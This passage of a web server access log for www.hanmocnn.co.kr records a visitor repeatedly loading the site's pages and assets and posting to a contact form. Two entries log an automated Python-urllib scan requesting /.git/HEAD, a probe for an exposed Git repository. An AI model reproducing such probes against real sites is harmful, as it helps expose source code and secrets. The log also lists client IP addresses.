NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:10:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8241] [Gzip 5.32] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:11:08 +0000] - 422 422 - POST https www.hanmocnn.co.kr "/api/contact" [Client 222.117.41.51] [Length 215] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:00:11:18 +0000] - 422 422 - POST https www.hanmocnn.co.kr "/api/contact" [Client 222.117.41.51] [Length 215] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:00:49:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8300] [Gzip 5.30] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:49:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5053] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:00:53:20 +0000] - - 301 - GET http www.hanmocnn.co.kr "/.git/HEAD" [Client 185.137.164.13] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Python-urllib/3.10" "-" -[15/Feb/2026:00:53:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/HEAD" [Client 185.137.164.18] [Length 153] [Gzip -] [Sent-to 192.168.0.250] "Python-urllib/3.10" "-" -[15/Feb/2026:00:53:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8300] [Gzip 5.30] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:53:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:00:53:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:00:53:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5055] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:00:54:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:03:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8968] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:03:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:03:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:03:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17289] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:03:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:03:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:05:52 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:05:52 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:05:52 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:05:52 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8968] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17289] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:07:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8968] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:07:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:07:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:07:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:07:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:08:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8968] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:08:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:08:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:08:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:08:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:10:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8968] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:10:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:10:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:10:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17235] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:10:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:10:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8968] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:10:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:10:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:10:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17235] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:10:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:11:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8968] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:11:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:11:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:11:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:11:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:14:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:14:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:14:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:14:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:14:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:14:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:14:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:14:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:14:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:14:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:16:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:16:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:16:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:16:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:16:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:17:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:17:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:17:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:17:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17246] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:17:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:18:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:18:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:18:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:18:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:18:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17243] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:18:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:01:18:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:18:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:18:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:01:18:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] 